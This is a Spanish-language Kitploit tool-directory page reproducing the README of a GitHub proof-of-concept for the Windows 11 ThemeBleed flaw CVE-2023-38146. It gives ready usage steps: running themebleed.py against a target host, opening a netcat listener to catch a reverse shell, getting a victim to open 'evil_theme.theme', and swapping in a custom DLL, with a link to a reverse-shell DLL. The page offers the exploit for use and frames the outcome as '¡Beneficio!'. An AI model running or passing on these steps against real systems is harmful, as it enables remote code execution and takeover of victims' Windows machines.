Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-38146 — PoC para el ThemeBleed de Windows 11 CVE-2023-38146 escrito en Python usando impacket. https://jnns.de/posts/cve-2023-38146-poc/ | Kitploit
Herramientas/GitHubGitHub/jnnshschl/cve-2023-38146
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubjnnshschl/cve-2023-38146

CVE-2023-38146

PoC para el ThemeBleed de Windows 11 CVE-2023-38146 escrito en Python usando impacket. https://jnns.de/posts/cve-2023-38146-poc/

Ver Repositorio
2745hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PoC para el exploit ThemeBleed CVE-2023-38146 (temas de Windows 11)

Muy inspirado en https://github.com/gabe-k/themebleed, que solo se ejecuta en Windows (la razón por la que decidí escribir esto).

Se usó código modificado del smbserver.py de impacket (https://github.com/fortra/impacket/blob/master/impacket/smbserver.py)

Cosas útiles: https://github.com/TalAloni/SMBLibrary/blob/master/SMBLibrary/NTFileStore/Enums/NtCreateFile/ShareAccess.cs

Entrada del blog: https://jnns.de/posts/cve-2023-38146-poc/

Cómo usar esto:

Instala los requisitos y ejecuta la aplicación:

pip3 install -r requirements.txt
python3 themebleed.py -r HOST -p 4711

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711

Usa el "evil_theme.theme" o "evil_theme.themepack" en una máquina vulnerable.

¡Beneficio!

Archivo DLL personalizado:

Coloca un archivo DLL con una función exportada "VerifyThemeVersion" en la carpeta "./td/" llamado "Aero.msstyles_vrf_evil.dll". Deberías poder encontrar un archivo DLL de ejemplo buscando en Google o usar mi ejemplo https://github.com/Jnnshschl/ThemeBleedReverseShellDLL.

pip3 install -r requirements.txt
python3 themebleed.py -r HOST --no-dll

# start nc listener in other shell
rlwrap -cAr nc -lvnp 4711
Descargar herramienta